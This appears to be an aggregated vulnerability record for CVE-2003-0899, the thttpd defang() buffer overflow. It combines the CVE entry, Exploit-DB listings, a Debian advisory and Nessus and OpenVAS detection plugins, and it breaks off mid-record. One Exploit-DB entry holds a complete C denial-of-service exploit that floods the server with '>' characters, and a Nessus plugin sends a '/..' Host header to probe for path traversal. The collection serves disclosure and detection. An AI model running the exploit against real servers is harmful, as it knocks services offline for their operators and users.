ID CVE-2003-0899 Type cve Reporter cve@mitre.org Modified 2017-07-11T01:29:00
Description
Buffer overflow in defang in libhttpd.c for thttpd 2.21 to 2.23b1 allows remote attackers to execute arbitrary code via requests that contain '<' or '>' characters, which trigger the overflow when the characters are expanded to "<" and ">" sequences.
This vulnerability is addressed in the following product release:
Acme Labs, thttpd, 2.24
{"exploitdb": [{"lastseen": "2016-02-02T20:43:06", "bulletinFamily": "exploit", "description": "thttpd 2.2x defang Remote Buffer Overflow Vulnerability (2). CVE-2003-0899 . Remote exploit for linux platform", "modified": "2003-10-27T00:00:00", "published": "2003-10-27T00:00:00", "id": "EDB-ID:23306", "href": "https://www.exploit-db.com/exploits/23306/", "type": "exploitdb", "title": "thttpd 2.2x defang Remote Buffer Overflow Vulnerability 2", "sourceData": "source: http://www.securityfocus.com/bid/8906/info\r\n \r\nA vulnerability has been reported in thttpd that may allow a remote attacker to execute arbitrary code on vulnerable host. The issue is reported to exist due to a lack of bounds checking by software, leading to a buffer overflow condition. The problem is reported to exist in the defang() function in libhttpd.c.\r\n \r\nThis issue may allow an attacker to gain unauthorized access to a vulnerable host. Successful exploitation of this issue may allow an attacker to execute arbitrary code in the context of the web server in order to gain unauthorized access to a vulnerable system.\r\n \r\nthttpd versions 2.21 to 2.23b1 have been reported to be prone to this issue, however other versions may be affected as well. \r\n\r\n==========================[ thttpd-sontot.c ]=========================\r\n \r\n// thttpd-sontot.c remote dos exploit by d3ck4\r\n// Base On Texonet Security Advisory 20030908\r\n// Application : thttpd\r\n// Version(s) : 2.21 - 2.23b1\r\n// Platforms : FreeBSD, SunOS 4, Solaris 2, BSD/OS, Linux, OSF\r\n// Solution : Upgrade to version 2.24\r\n// Remote exploit not yet ;P~\r\n \r\n#include <stdio.h>\r\n#include <netinet/in.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <netdb.h>\r\n\r\nint main(int argc, char **argv)\r\n{\r\n struct sockaddr_in addr;\r\n struct hostent *host;\r\n char buffer[1000];\r\n char buffer1[1130];\r\n int s, i;\r\n if(argc != 3)\r\n {\r\n fprintf(stderr, \"usage: %s <host> <port>\\n\", argv[0]);\r\n exit(0);\r\n }\r\n s = socket(AF_INET, SOCK_STREAM, 0);\r\n if(s == -1)\r\n {\r\n perror(\"socket() failed\\n\");\r\n exit(0);\r\n }\r\n host = gethostbyname(argv[1]);\r\n if( host == NULL)\r\n {\r\n herror(\"gethostbyname() failed\");\r\n exit(0);\r\n }\r\n addr.sin_addr = *(struct in_addr*)host->h_addr;\r\n addr.sin_family = AF_INET;\r\n addr.sin_port = htons(atol(argv[2]));\r\n \r\n if(connect(s, &addr, sizeof(addr)) == -1)\r\n {\r\n perror(\"couldn't connect to server\\n\");\r\n exit(0);\r\n }\r\n \r\n for(i = 0; i < 1000 ; i++)\r\n buffer1[i] = '>';\r\n sprintf(buffer, \"GET /%s HTTP/1.0\\r\\n\\r\\n\\r\\n\", buffer1);\r\n printf(\"\\n(Drink Tongkat-Ali For Better Performance ;P~ !)\\n\\n\");\r\n printf(\"Buffer is: %s\\n\\n\", buffer1);\r\n printf(\"Buffer filled... now sending buffer\\n\");\r\n send(s, buffer, strlen(buffer), 0);\r\n \r\n printf(\"Buffer sent.\\nNow thttpd daemon should be dead !!!\\n\\n\");\r\n close(s);\r\n return 0;\r\n}\r\n \r\n/* EOF */\r\n\r\n==========================[ thttpd-sontot.c ]=========================\r\n\r\n\r\n---------------------------------\r\nDo you Yahoo!?\r\nFree Pop-Up Blocker - Get it now", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/23306/"}, {"lastseen": "2016-02-02T20:42:58", "bulletinFamily": "exploit", "description": "thttpd 2.2x defang Remote Buffer Overflow Vulnerability (1). CVE-2003-0899 . Dos exploit for linux platform", "modified": "2003-10-27T00:00:00", "published": "2003-10-27T00:00:00", "id": "EDB-ID:23305", "href": "https://www.exploit-db.com/exploits/23305/", "type": "exploitdb", "title": "thttpd 2.2x defang Remote Buffer Overflow Vulnerability 1", "sourceData": "source: http://www.securityfocus.com/bid/8906/info\r\n\r\nA vulnerability has been reported in thttpd that may allow a remote attacker to execute arbitrary code on vulnerable host. The issue is reported to exist due to a lack of bounds checking by software, leading to a buffer overflow condition. The problem is reported to exist in the defang() function in libhttpd.c.\r\n\r\nThis issue may allow an attacker to gain unauthorized access to a vulnerable host. Successful exploitation of this issue may allow an attacker to execute arbitrary code in the context of the web server in order to gain unauthorized access to a vulnerable system.\r\n\r\nthttpd versions 2.21 to 2.23b1 have been reported to be prone to this issue, however other versions may be affected as well. \r\n\r\nstatic void\r\ndefang( char* str, char* dfstr, int dfsize )\r\n {\r\n char* cp1;\r\n char* cp2;\r\n\r\n for ( cp1 = str, cp2 = dfstr;\r\n *cp1 != '\\0' && cp2 - dfstr < dfsize - 1;\r\n ++cp1, ++cp2 )\r\n {\r\n switch ( *cp1 )\r\n {\r\n case '<':\r\n *cp2++ = '&';\r\n *cp2++ = 'l';\r\n *cp2++ = 't';\r\n *cp2 = ';';\r\n break;\r\n case '>':\r\n *cp2++ = '&';\r\n *cp2++ = 'g';\r\n *cp2++ = 't';\r\n *cp2 = ';';\r\n break;\r\n default:\r\n *cp2 = *cp1;\r\n break;\r\n }\r\n }\r\n *cp2 = '\\0';\r\n }\r\n\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/23305/"}], "osvdb": [{"lastseen": "2017-04-28T13:19:57", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:10092](https://secuniaresearch.flexerasoftware.com/advisories/10092/)\nISS X-Force ID: 13530\n[CVE-2003-0899](https://vulners.com/cve/CVE-2003-0899)\nBugtraq ID: 8906\n", "modified": "2003-10-27T07:26:23", "published": "2003-10-27T07:26:23", "id": "OSVDB:2729", "href": "https://vulners.com/osvdb/OSVDB:2729", "title": "thttpd defang() Function Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2019-05-30T02:22:46", "bulletinFamily": "unix", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 396-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nOctober 29th, 2003 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : thttpd\nVulnerability : missing input sanitizing, wrong calculation\nProblem-Type : remote\nDebian-specific: no\nCVE Id : CAN-2002-1562 CAN-2003-0899\n\nSeveral vulnerabilities have been discovered in thttpd, a tiny HTTP\nserver.\n\nThe Common Vulnerabilities and Exposures project identifies the\nfollowing vulnerabilities:\n\nCAN-2002-1562: Information leak\n\n Marcus Breiing discovered that if thttpd it is used for virtual\n hosting, and an attacker supplies a specially crafted ``Host:''\n header with a pathname instead of a hostname, thttpd will reveal\n information about the host system. Hence, an attacker can browse\n the entire disk.\n\nCAN-2003-0899: Arbitrary code execution\n\n Joel Soderberg and Christer Oberg discovered a remote overflow which\n allows an attacker to partially overwrite the EBP register and\n hencely execute arbitrary code.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 2.21b-11.2.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 2.23beta1-2.3.\n\nWe recommend that you upgrade your thttpd package immediately.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/t/thttpd/thttpd_2.21b-11.2.dsc\n Size/MD5 checksum: 545 8a1acb90e6094f3fa72c6845c3053041\n http://security.debian.org/pool/updates/main/t/thttpd/thttpd_2.21b-11.2.diff.gz\n Size/MD5 checksum: 12319 2ac5366cf965d9fc492265d095c108a8\n http://security.debian.org/pool/updates/main/t/thttpd/thttpd_2.21b.orig.tar.gz\n Size/MD5 checksum: 127157 9c1512664cf70c286331243ab622173e\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/t/thttpd/thttpd_2.21b-11.2_alpha.deb\n Size/MD5 checksum: 67512 4b98098b019e2b8d0b1ce1e9aeb617ec\n http://security.debian.org/pool/updates/main/t/thttpd/thttpd-util_2.21b-11.2_alpha.deb\n Size/MD5 checksum: 27794 9edd14ad49dad106626771543c106937\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/t/thttpd/thttpd_2.21b-11.2_arm.deb\n Size/MD5 checksum: 54182 c191681665f0af7df0ee90136b3365ff\n http://security.debian.org/pool/updates/main/t/thttpd/thttpd-util_2.21b-11.2_arm.deb\n Size/MD5 checksum: 23212 2103ca75c4ea13b97e5744d89949fe37\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/t/thttpd/thttpd_2.21b-11.2_i386.deb\n Size/MD5 checksum: 51914 d699b326d3ebc75476cafe31e91e45ec\n http://security.debian.org/pool/updates/main/t/thttpd/thttpd-util_2.21b-11.2_i386.deb\n Size/MD5 checksum: 23570 157936de6bd22736b0aa63e2224d65ba\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/t/thttpd/thttpd_2.21b-11.2_ia64.deb\n Size/MD5 checksum: 77950 cc5e735539ad1c550b9af17c2388bc83\n http://security.debian.org/pool/updates/main/t/thttpd/thttpd-util_2.21b-11.2_ia64.deb\n Size/MD5 checksum: 29562 954eaaa5f8c824cba7725921f65a3331\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/t/thttpd/thttpd_2.21b-11.2_hppa.deb\n Size/MD5 checksum: 59116 7f77611819d41bf76d5f835d970f3ed8\n http://security.debian.org/pool/updates/main/t/thttpd/thttpd-util_2.21b-11.2_hppa.deb\n Size/MD5 checksum: 25448 cd644f20dcc58dfca543600a74dc95c8\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/t/thttpd/thttpd_2.21b-11.2_m68k.deb\n Size/MD5 checksum: 49552 72cca53687444bef03134030c6662511\n http://security.debian.org/pool/updates/main/t/thttpd/thttpd-util_2.21b-11.2_m68k.deb\n Size/MD5 checksum: 23220 5677cb4faf6d7b586ba1268c2e35e65c\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/t/thttpd/thttpd_2.21b-11.2_mips.deb\n Size/MD5 checksum: 58236 446d260842da0922cba728e2df11b56b\n http://security.debian.org/pool/updates/main/t/thttpd/thttpd-util_2.21b-11.2_mips.deb\n Size/MD5 checksum: 24516 da2230823d6337e7665254f9700c02b8\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/t/thttpd/thttpd_2.21b-11.2_mipsel.deb\n Size/MD5 checksum: 58334 04df64db72249b74039f26e23f384f62\n http://security.debian.org/pool/updates/main/t/thttpd/thttpd-util_2.21b-11.2_mipsel.deb\n Size/MD5 checksum: 24598 451b2c66266919a2a45740336e157518\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/t/thttpd/thttpd_2.21b-11.2_powerpc.deb\n Size/MD5 checksum: 56474 37163f189b04526056738e72514e0870\n http://security.debian.org/pool/updates/main/t/thttpd/thttpd-util_2.21b-11.2_powerpc.deb\n Size/MD5 checksum: 23836 fac814ed369bd38e7294d7190a8aad8a\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/t/thttpd/thttpd_2.21b-11.2_s390.deb\n Size/MD5 checksum: 54658 b05a18adb9af89e183846135ea272b2e\n http://security.debian.org/pool/updates/main/t/thttpd/thttpd-util_2.21b-11.2_s390.deb\n Size/MD5 checksum: 24392 ea2d972ab7dc89df2c232c71c246bf30\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/t/thttpd/thttpd_2.21b-11.2_sparc.deb\n Size/MD5 checksum: 58226 5505dc14188fcd27a6ec7fee1f482a78\n http://security.debian.org/pool/updates/main/t/thttpd/thttpd-util_2.21b-11.2_sparc.deb\n Size/MD5 checksum: 29954 85b41622907ece7edfc7d10f78a83946\n\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "modified": "2003-10-29T00:00:00", "published": "2003-10-29T00:00:00", "id": "DEBIAN:DSA-396-1:0BEE0", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2003/msg00204.html", "title": "[SECURITY] [DSA 396-1] New thttpd packages fix information leak, DoS and arbitrary code execution", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2019-02-21T01:07:48", "bulletinFamily": "scanner", "description": "The remote HTTP server allows anyone to browse the files on the remote host by sending HTTP requests with a Host: field set to '../../'.", "modified": "2018-08-01T00:00:00", "id": "THTTPD_VIRTUALHOST_ESCAPE.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=11576", "published": "2003-05-06T00:00:00", "title": "thttpd Host Header Traversal Arbitrary File Access", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(11576);\n script_version (\"1.18\");\n script_cve_id(\"CVE-2002-1562\", \"CVE-2003-0899\");\n script_bugtraq_id(8924, 8906);\n script_xref(name:\"SuSE\", value:\"SUSE-SA:2003:044\");\n \n script_name(english:\"thttpd Host Header Traversal Arbitrary File Access\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"It may be possible to read arbitrary files from the remote \nsystem.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote HTTP server allows anyone to browse the files on \nthe remote host by sending HTTP requests with a Host: field \nset to '../../'.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to thttpd 2.23 or newer.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2003/05/06\");\n script_cvs_date(\"Date: 2018/08/01 17:36:14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2002/10/31\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n \n script_summary(english:\"thttpd flaw\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2003-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Web Servers\");\n script_dependencie(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80);\n\nres = http_send_recv3(method:\"GET\", item:\"/\", port:port);\nif(isnull(res)) exit(1,\"Null response to / request.\");\n\nlist1 = NULL;\nif(\"mode links bytes last-changed name\" >< res[2]) { list1 = res[2]; }\n\nres = http_send_recv3(method:\"GET\", item:\"/\", port:port,\n add_headers: make_array(\"Host\", string(get_host_name(),\"/..\"))\n );\n \nif(isnull(res)) exit(1,\"Null response to second / request.\");\n \nif(\"mode links bytes last-changed name\" >< res[2])\n{\n if(!list1)security_warning(port);\n else \t\n {\n l = strstr(list1, string(\"\\r\\n\\r\\n\"));\n m = strstr(res[2], string(\"\\r\\n\\r\\n\"));\n #display(m);\n if(l != m)security_warning(port);\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:07:57", "bulletinFamily": "scanner", "description": "The remote host is missing the patch for the advisory SuSE-SA:2003:044 (thttpd).\n\n\nTwo vulnerabilities were found in the 'tiny' web-server thttpd.\nThe first bug is a buffer overflow that can be exploited remotely to overwrite the EBP register of the stack. Due to memory-alignment of the stack done by gcc 3.x this bug can not be exploited. All thttpd versions mentioned in this advisory are compiled with gcc 3.x and are therefore not exploitable.\nThe other bug occurs in the virtual-hosting code of thttpd. A remote attacker can bypass the virtual-hosting mechanism to read arbitrary files.\n\nPlease download the update package for your distribution and verify its integrity by the methods listed in section 3) of this announcement.\nThen, install the package using the command 'rpm -Fhv file.rpm' to apply the update.", "modified": "2016-12-27T00:00:00", "id": "SUSE_SA_2003_044.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=13812", "published": "2004-07-25T00:00:00", "title": "SuSE-SA:2003:044: thttpd", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# This plugin text was extracted from SuSE Security Advisory SuSE-SA:2003:044\n#\n\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(13812);\n script_bugtraq_id(8906, 8924);\n script_version (\"$Revision: 1.13 $\");\n script_cve_id(\"CVE-2002-1562\", \"CVE-2003-0899\");\n \n name[\"english\"] = \"SuSE-SA:2003:044: thttpd\";\n \n script_name(english:name[\"english\"]);\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a vendor-supplied security patch\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing the patch for the advisory SuSE-SA:2003:044 (thttpd).\n\n\nTwo vulnerabilities were found in the 'tiny' web-server thttpd.\nThe first bug is a buffer overflow that can be exploited remotely\nto overwrite the EBP register of the stack. Due to memory-alignment of\nthe stack done by gcc 3.x this bug can not be exploited. All thttpd\nversions mentioned in this advisory are compiled with gcc 3.x and are\ntherefore not exploitable.\nThe other bug occurs in the virtual-hosting code of thttpd. A remote\nattacker can bypass the virtual-hosting mechanism to read arbitrary\nfiles.\n\nPlease download the update package for your distribution and verify its\nintegrity by the methods listed in section 3) of this announcement.\nThen, install the package using the command 'rpm -Fhv file.rpm' to apply\nthe update.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"http://www.suse.de/security/2003_044_thttpd.html\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119);\n\n\n\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/07/25\");\n script_cvs_date(\"$Date: 2016/12/27 20:14:32 $\");\n script_end_attributes();\n\n \n summary[\"english\"] = \"Check for the version of the thttpd package\";\n script_summary(english:summary[\"english\"]);\n \n script_category(ACT_GATHER_INFO);\n \n script_copyright(english:\"This script is Copyright (C) 2004-2016 Tenable Network Security, Inc.\");\n family[\"english\"] = \"SuSE Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/SuSE/rpm-list\");\n exit(0);\n}\n\ninclude(\"rpm.inc\");\nif ( rpm_check( reference:\"thttpd-2.20b-175\", release:\"SUSE7.3\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"thttpd-2.20c-98\", release:\"SUSE8.0\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"thttpd-2.23beta1-163\", release:\"SUSE8.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"thttpd-2.23beta1-164\", release:\"SUSE8.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"thttpd-2.23beta1-165\", release:\"SUSE9.0\") )\n{\n security_hole(0);\n exit(0);\n}\nif (rpm_exists(rpm:\"thttpd-\", release:\"SUSE7.3\")\n || rpm_exists(rpm:\"thttpd-\", release:\"SUSE8.0\")\n || rpm_exists(rpm:\"thttpd-\", release:\"SUSE8.1\")\n || rpm_exists(rpm:\"thttpd-\", release:\"SUSE8.2\")\n || rpm_exists(rpm:\"thttpd-\", release:\"SUSE9.0\") )\n{\n set_kb_item(name:\"CVE-2002-1562\", value:TRUE);\n set_kb_item(name:\"CVE-2003-0899\", value:TRUE);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:08:11", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been discovered in thttpd, a tiny HTTP server.\n\nThe Common Vulnerabilities and Exposures project identifies the following vulnerabilities :\n\n - CAN-2002-1562: Information leak Marcus Breiing discovered that if thttpd it is used for virtual hosting, and an attacker supplies a specially crafted 'Host:' header with a pathname instead of a hostname, thttpd will reveal information about the host system. Hence, an attacker can browse the entire disk.\n\n - CAN-2003-0899: Arbitrary code execution Joel Soderberg and Christer Oberg discovered a remote overflow which allows an attacker to partially overwrite the EBP register and hence execute arbitrary code.", "modified": "2018-07-20T00:00:00", "id": "DEBIAN_DSA-396.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=15233", "published": "2004-09-29T00:00:00", "title": "Debian DSA-396-1 : thttpd - missing input sanitizing, wrong calculation", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 70103\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-396. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(15233);\n script_version(\"1.23\");\n script_cvs_date(\"Date: 2018/07/20 2:17:11\");\n\n script_cve_id(\"CVE-2002-1562\", \"CVE-2003-0899\");\n script_bugtraq_id(8906, 8924);\n script_xref(name:\"DSA\", value:\"396\");\n\n script_name(english:\"Debian DSA-396-1 : thttpd - missing input sanitizing, wrong calculation\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in thttpd, a tiny HTTP\nserver.\n\nThe Common Vulnerabilities and Exposures project identifies the\nfollowing vulnerabilities :\n\n - CAN-2002-1562: Information leak\n Marcus Breiing discovered that if thttpd it is used for\n virtual hosting, and an attacker supplies a specially\n crafted 'Host:' header with a pathname instead of a\n hostname, thttpd will reveal information about the host\n system. Hence, an attacker can browse the entire disk.\n\n - CAN-2003-0899: Arbitrary code execution\n Joel Soderberg and Christer Oberg discovered a remote\n overflow which allows an attacker to partially overwrite\n the EBP register and hence execute arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2003/dsa-396\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the thttpd package immediately.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 2.21b-11.2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/10/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"thttpd\", reference:\"2.21b-11.2\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"thttpd-util\", reference:\"2.21b-11.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-07-24T12:50:01", "bulletinFamily": "scanner", "description": "The remote host is missing an update to thttpd\nannounced via advisory DSA 396-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=53377", "id": "OPENVAS:53377", "title": "Debian Security Advisory DSA 396-1 (thttpd)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_396_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 396-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities have been discovered in thttpd, a tiny HTTP\nserver.\n\nThe Common Vulnerabilities and Exposures project identifies the\nfollowing vulnerabilities:\n\nCVE-2002-1562: Information leak\n\nMarcus Breiing discovered that if thttpd it is used for virtual\nhosting, and an attacker supplies a specially crafted ``Host:''\nheader with a pathname instead of a hostname, thttpd will reveal\ninformation about the host system. Hence, an attacker can browse\nthe entire disk.\n\nCVE-2003-0899: Arbitrary code execution\n\nJoel Soderberg and Christer Oberg discovered a remote overflow which\nallows an attacker to partially overwrite the EBP register and\nhencely execute arbitrary code.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 2.21b-11.2.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 2.23beta1-2.3.\n\nWe recommend that you upgrade your thttpd package immediately.\";\ntag_summary = \"The remote host is missing an update to thttpd\nannounced via advisory DSA 396-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20396-1\";\n\nif(description)\n{\n script_id(53377);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:36:24 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2002-1562\", \"CVE-2003-0899\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 396-1 (thttpd)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"thttpd\", ver:\"2.21b-11.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"thttpd-util\", ver:\"2.21b-11.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": 